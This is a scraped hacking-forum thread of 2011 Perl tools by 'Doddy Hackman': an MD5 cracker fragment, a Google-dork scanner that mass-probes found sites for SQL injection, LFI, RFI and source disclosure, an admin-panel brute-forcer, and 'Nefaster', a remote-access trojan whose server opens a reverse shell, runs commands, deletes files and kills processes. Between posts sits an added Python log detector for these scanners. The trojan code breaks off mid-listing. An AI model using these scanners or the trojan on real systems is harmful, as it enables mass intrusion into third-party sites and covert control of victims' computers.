'tipo' => 'get',
'regex' => qq(MD5 расшифрован: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n";
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?


Usage example

Código: text

perl crack.pl <hash>
#338
Perl / [Perl] Paranoic Scan By Doddy H
Julio 03, 2011, 09:48:39 PM
Hi.

Today I bring a program I've been working on because I was fed up with testing every
site I found on google to find out whether it had the vulnerability I wanted.
So that's why I made this tool, with the following options:

* Lets you scan a file of sites
* Lets you search google, remove duplicates, and then scan


Scan types:

* SQL
* LFI
* RFI
* FULL SOURCE DISCLOSURE



Usage example


Código: text




@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




[a] : Scan a File
[b] : Search in google and scan the webs

[option] : b

[+] Dork : ficha.php+id
[+] Pages : 200


[+] Scan Type :

[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All


[Option] : s

[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200

[+] Searching pages..
[+] Cleaning results

[Status] : Scanning
[Webs Count] : 136


[Status] : Finish



(C) Doddy Hackman 2010



Code

Código: perl

#!/usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
}
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
}
return(repes(@r));
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
}
return(@r);
}

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

#339
Perl / [Perl] Panel Control 0.6
Julio 03, 2011, 09:48:11 PM
The new version of this tool for finding
the administration panel

Código: perl

#!/usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
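Added here as a defensive example, not code from the original posts: the Python below reads combined-format web access logs and flags three things the two scripts above leave behind, the fixed probe tokens that Paranoic Scan's sql/rfi/lfi/fsd subs append to a URL, the burst of admin paths Panel Control requests, and the malformed User-Agent both scripts hard-code. The log lines, IP addresses, panel-path subset and threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log line:
#   ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# User-Agent hard-coded in both scripts above: "20080201Firefox" lacks the space
# a real Firefox sends, which makes it a cheap and precise fingerprint.
SCANNER_UA_MARK = "Gecko/20080201Firefox/2.0.0.12"

# A few entries from the Panel Control wordlist above (enough for the demo).
PANEL_PATHS = {
    "/admin/admin.asp", "/admin/login.asp", "/admin/index.asp", "/admin/",
    "/admin.php", "/login.php", "/administrator/", "/phpmyadmin/", "/wp-admin/",
}
PANEL_THRESHOLD = 5  # distinct panel paths from one IP before we call it enumeration

# sql() appends "-1+union+select+666--"; parse_qsl turns the '+' into spaces.
SQLI_PROBE = re.compile(r"^-1 union select 666--$", re.I)


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_probe(target):
    """Name the Paranoic Scan probe a request target matches, or None.
    Mirrors the sql/rfi/lfi/fsd subs above, each of which appends a fixed token
    to a URL ending in 'param='. RFI is generalised to any value that starts with
    'http:/' (the script itself sends that single-slash form)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        v = value.strip()
        if SQLI_PROBE.match(v):
            return "SQLI"
        if v.lower().startswith("http:/"):
            return "RFI"
        if v == "'":
            return "LFI"
        if script and v == script:
            return "FSD"
    return None


def analyse(lines):
    """Return {'probes': [(ip, kind, target)], 'panel_enum': {ip: n_paths},
    'scanner_ua': {ip}} for an iterable of raw log lines."""
    probes, panel_hits, ua_ips = [], defaultdict(set), set()
    for line in lines:
        rec = parse_line(line.rstrip("\n"))
        if rec is None:
            continue
        if SCANNER_UA_MARK in rec["ua"]:
            ua_ips.add(rec["ip"])
        kind = classify_probe(rec["target"])
        if kind:
            probes.append((rec["ip"], kind, rec["target"]))
        path = urlsplit(rec["target"]).path
        if path in PANEL_PATHS:
            panel_hits[rec["ip"]].add(path)
    panel_enum = {ip: len(p) for ip, p in panel_hits.items() if len(p) >= PANEL_THRESHOLD}
    return {"probes": probes, "panel_enum": panel_enum, "scanner_ua": ua_ips}


# Constructed sample (not a real log): 203.0.113.5 runs both tools against
# /opinion/ficha.php; 198.51.100.7 is an ordinary visitor who opens the real admin page.
_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
_OK_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0"


def _line(ip, request, status, ua):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [03/Jul/2011:21:48:39 -0300] "GET {request} HTTP/1.1" {status} 512 "-" "{ua}"'


SAMPLE_LOG = [
    _line("203.0.113.5", "/opinion/ficha.php?id=-1+union+select+666--", 200, _UA),
    _line("203.0.113.5", "/opinion/ficha.php?id=http:/www.supertangas.com/", 200, _UA),
    _line("203.0.113.5", "/opinion/ficha.php?id='", 500, _UA),
    _line("203.0.113.5", "/opinion/ficha.php?id=ficha.php", 200, _UA),
    *[_line("203.0.113.5", p, 404, _UA) for p in (
        "/admin/admin.asp", "/admin/login.asp", "/admin/index.asp",
        "/admin.php", "/login.php", "/administrator/", "/phpmyadmin/")],
    _line("198.51.100.7", "/opinion/ficha.php?id=42", 200, _OK_UA),
    _line("198.51.100.7", "/admin/", 302, _OK_UA),
]

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(key, value)
```

Panel Control treats any 2xx as a hit, so a site that answers 200 for unknown paths will make it report every entry; on the defending side that same behaviour hides nothing from the enumeration counter above, which keys on the paths requested rather than on the status returned.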
#340
Perl / [Perl] Nefaster
Julio 03, 2011, 09:47:59 PM
Well, this is my trojan Nefaster; in this version I fixed several things, which I'll go on to detail

  • Show information
  • File browser
  • Change browsing directory
  • Create file
  • Delete file
  • Delete directory
  • Play music or videos by entering the path in the option
  • Stop playback
  • Open CD tray
  • Close CD tray
  • Open ports
  • Message
  • Run commands
  • Hide taskbar
  • Restore taskbar
  • Hide desktop icons
  • Restore desktop icons
  • Manage processes, with the option to kill whichever you want
  • Reverse shell, in case you want to run commands more comfortably

The client code is this

    Código: perl

    #!/usr/bin/perl
    #Nefester (Cliente) 0.1 By Doddy H


    use IO::Socket;
    use Cwd;

    &menu;

    sub head {

    system 'cls';

    print q(


                E      F                   TT    E       
    NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR
    NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR
    NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R
    NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR 
    NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R 
    NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R
    NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                                SS                 R   R 



    );

    }

    sub menu {

    &head;

    print "[Target] : ";
    chomp(my $ip = <STDIN>);



    my $socket = new IO::Socket::INET(
    PeerAddr => $ip,
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    if ($socket) {
    $socket->close;
    &menuo($ip);
    } else {
    print "\n\n[-] Target no infectado\n";
    <STDIN>;
    &menu;
    }

    }

    sub menuo {

    &head;

    print "[$_[0]] : Servidor Activado\n\n";
    print q(
    1 : Informacion
    2 : Navegador
    3 : Abrir CD
    4 : Cerrar CD
    5 : Puertos abiertos
    6 : Mensaje
    7 : CMD
    8 : Esconder barra de tareas
    9 : Devolver barra de tareas
    10 : Esconder iconos
    11 : Devolver iconos
    12 : Administrar procesos
    13 : Reverse Shell
    14 : Cambiar IP
    15 : Salir


    );
    print "[Opcion] : ";
    chomp(my $opcion = <STDIN>);


    if ($opcion eq 1) {
    print "\n\n[+] Informacion\n\n";
    $re = daryrecibir($_[0],"infor");
    if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
    print "[Dominio] : $1\n";
    print "[Chip] : $2\n";
    print "[Version] : $3\n";
    print "[Nombre] : $4\n";
    print "[OS] : $5\n";
    <stdin>;
    }
    &menuo($_[0]);
    }
    elsif ($opcion eq 2) {

    menu1:
    print "\n\n[+] Navegacion de archivos\n\n";
    $cwd = daryrecibir($_[0],"getcwd"."\r\n");
    print "tengo $cwd\n";
    show($_[0],"/");
    &menu2;

    sub menu2 {
    print "\n\n[Opciones]\n\n";
    print "1 - Cambiar directorio\n";
    print "2 - Crear archivo\n";
    print "3 - Borrar archivo\n";
    print "4 - Borrar directorio\n";
    print "5 - Reproducir musica\n";
    print "6 - Parar reproduccion\n";
    print "7 - Volver al menu inicial\n\n";
    print "[Opcion] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[+] Directorio : ";
    chomp (my $dir=<stdin>);
    $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
    if ($ver=~/ok/ig) {
    print "\n\n[+] Directory changed\n\n";
    }
    show($_[0],$dir);
    &menu2;
    <stdin>;
    }

    elsif ($op eq 2) {

    print "\n\n[Nombre] : ";
    chomp(my $name = <stdin>);
    print "\n\n[Contenido] : ";
    chomp(my $code = <stdin>);

    daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

    print "\n\n[+] Archivo creado \n\n";
    <stdin>;
    }
    elsif ($op eq 3) {
    print "\n\n[Archivo a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Archivo Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 4) {
    print "\n\n[Directorio a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Directorio Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 5) {
    print "\n\n[Archivo] : ";
    chomp(my $file = <stdin>);
    print "\n\n[+] Reproduciendo\n\n";
    daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
    <stdin>;
    }
    elsif ($op eq 6) {
    print "\n\n[+] Reproduccion detenida\n\n";
    daryrecibir($_[0],"pararmusic");
    <stdin>;
    }
    elsif ($op eq 7) {
    &menuo($_[0]);
    }
    else {
    show($_[0],"/");
    }
    goto menu1;
    }
    }

    elsif ($opcion eq 3) {
    daryrecibir($_[0],"opencd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 4) {
    daryrecibir($_[0],"closedcd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 5) {
    print "\n[Puertos Abiertos]\n\n";
    $re = daryrecibir($_[0],"porters");
    while ($re=~/:(.*?):/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 6) {
    print "\n[Mensaje] : ";
    chomp (my $msg = <stdin>);
    daryrecibir($_[0],"msgbox $msg");
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 7) {

    menu:

    my $cmd,$re;

    print "\n\n>";

    chomp(my $cmd= <stdin>);

    if ($cmd=~/exit/ig) {
    &menuo($_[0]);
    }

    $re = daryrecibir($_[0],"comando :$cmd:");
    print "\n".$re;
    goto menu;
    &menuo($_[0]);
    }
    elsif ($opcion eq 8) {
    daryrecibir($_[0],"iniciochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 9) {
    daryrecibir($_[0],"iniciovuelve");
    &menuo($_[0]);
    }
    elsif ($opcion eq 10) {
    daryrecibir($_[0],"iconochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 11) {
    daryrecibir($_[0],"iconovuelve");
    &menuo($_[0]);
    }

    elsif ($opcion eq 12) {

    &reload($_[0]);

    sub reload {

    my @pro;
    my @pids;

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    print $sockex "mostrarpro"."\r\n";
    $sockex->read($re,5000);
    $sockex->close;

    chomp $re;

    print "\n\n[+] Procesos encontrados\n\n";

    while ($re=~/PROXEC(.*?)PROXEC/ig) {
    if ($1 ne "") {
    push(@pro,$1);
    }
    }

    while ($re=~/PIDX(.*?)PIDX/ig) {
    if ($1 ne "") {
    push(@pids,$1);
    }
    }

    $cantidad = int(@pro);

    for my $num(1..$cantidad) {
    if ($pro[$num] ne "") {
    print "\n[+] Proceso : ".$pro[$num]."\n";
    print "[+] PIDS : ".$pids[$num]."\n";
    }
    }

    print q(

    [Opciones]


    1 - Refrescar lista
    2 - Cerrar procesos
    3 - Volver al menu

    );

    print "\n[Opcion] :  ";
    chomp(my $opc = <stdin>);

    if ($opc=~/1/ig) {
    &reload($_[0]);
    }
    elsif($opc=~/2/ig) {
    print "\n[+] Write the name of the process : ";
    chomp(my $numb = <stdin>);
    print "\n[+] Write the PID of the process : ";
    chomp(my $pid = <stdin>);
    $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
    if ($re=~/ok/ig) {
    print "\n\n[+] Proceso cerrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    &reload($_[0]);
    }
    elsif($opc=~/3/ig) {
    &menuo($_[0]);
    }
    else {
    &reload;
    }
    }
    }

    elsif ($opcion eq 13) {
    print "\n\n[IP] : ";
    chomp(my $ip = <stdin>);
    print "\n\n[Port] : ";
    chomp(my $port = <stdin>);
    print "\n\n[+] Connected !!!\n\n";
    $re = daryrecibir($_[0],"backshell :$ip:$port:");
    }
    elsif ($opcion eq 14) {
    &menu;
    }
    elsif ($opcion eq 15) {
    exit 1;
    }
    else {
    &menuo;
    }
    }

    sub daryrecibir {

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    print $sockex $_[1]."\r\n";
    $sockex->read($re,5000);
    $sockex->close;
    return $re."\r";
    }

    sub show {

    my $re = daryrecibir($_[0],"getcwd"."\r\n");
    print "\n\n[+] Directorio Actual : $re\n\n";
    $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
    print "\n\n[Directorios]\n\n";

    while ($re1=~/DIREX(.*?)DIREX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    print "\n\n[Archivos]\n\n";

    while ($re1=~/FILEX(.*?)FILEX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    }

    #
    # ¿ The End ?
    #


And the server

    Código: perl


    #!/usr/bin/perl
    #Nefester (sERVidor) 0.1 By Doddy H
    #Compile with perl2exe to get rid of the console window

    use IO::Socket;
    use Socket;
    use Win32;
    use Cwd;
    use Win32::MediaPlayer;
    use Win32::Process::List;
    use Win32::Process;
    use Win32::API;

    use constant SW_HIDE => 0;
    use constant SW_SHOWNORMAL => 1;

    my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
    my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

    $test = new Win32::MediaPlayer;

    my $sock = IO::Socket::INET->new(LocalPort => 666,
    Listen => 10,
    Proto => 'tcp',
    Reuse => 1);

    print "online\n";

    while (my $con = $sock->accept){
    $resultado = <$con>;
    print "boludo mando : $resultado\n";

    if ($resultado=~/msgbox (.*)/ig) {
    Win32::MsgBox($1,0,"Mensaje de Dios")
    }

    if ($resultado=~/backshell :(.*):(.*):/ig) {

    my ($ip,$port) = ($1,$2);

    print "conectando $ip con $port\n";

    $ip =~s/(\s)+$//;
    $port =~s/(\s)+$//;

    conectar($ip,$port);
    tipo();

    sub conectar {
    socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
    open (STDIN,">&REVERSE");
    open (STDOUT,">&REVERSE");
    open (STDERR,">&REVERSE");
    }

    sub tipo {
    print "\n[*] Reverse Shell Starting...\n\n";
    if ($^O =~/Win32/ig) {
    infowin();
    system("cmd.exe");
    } else {
    infolinux();
    #root(); 
    system("export TERM=xterm;exec sh -i");
    }
    }

    sub infowin {
    print "[+] Domain Name : ".Win32::DomainName()."\n";
    print "[+] OS Version : ".Win32::GetOSName()."\n";
    print "[+] Username : ".Win32::LoginName()."\n\n\n";
    }

    sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
    }


    }

    if ($resultado =~/opencd/ig) {

    use Win32::API;

    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door open', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

    my ($pid,$numb) = ($1,$2);

    $pid=~s/(\s)+$//;
    $numb=~s/(\s)+$//;

    if (Win32::Process::KillProcess($pid,$numb)) {
    print $con "ok\r\n";
    }
    }

    if ($resultado =~/closedcd/ig) {

    use Win32::API;

    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door closed', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

    my $filex = $1;

    $filex =~s/(\s)+$//;

    print getcwd()."/".$filex."\n\n";

    if (unlink(getcwd()."/".$filex)) {
    print $con "ok\r\n";
    }

    }



    if ($resultado=~/infor/ig) {
    print "mando";
    use Win32;


    my $domain = Win32::DomainName();
    my $chip = Win32::GetChipName();
    my $version = Win32::GetOSVersion();
    my $nombre = Win32::LoginName();
    my  $os = Win32::GetOSName();

    print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
    }


    if ($resultado=~/porters/ig) {

    use Net::Netstat::Wrapper;

    $por = "";
    @ports = Net::Netstat::Wrapper->only_port();
    for(@ports) {
    $por = $por.":".$_;
    }
    print $con $por."\r\n";
    }


    if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

    my $cancion = $1;

    $cancion =~s/(\s)+$//;

    $test->load($cancion);
    $test->play;

    }

    if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

    my $dir = $1;
    $dir =~s/(\s)+$//;


    if (chdir($dir)) {
    print $con "ok\r\n";
    }

    }

    if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

    my $veox = $1;
    $veox =~s/(\s)+$//;

    if (rmdir(getcwd()."/".$veox)) {
    print $con "ok\r\n";
    }
    }



    if ($resultado=~/pararmusic/ig) {
    $test->close;
    }



    if ($resultado=~/dirnow ACATOY(.*)/ig) {

    my $real = $1;
    chomp $real;

    $real =~s/(\s)+$//;

    print "real $real\n\n";

    my @archivos = coleccionar($real);

    for (@archivos) {
    print $_."\n";
    my $todo = $real."/".$_;

    print $todo."\n";

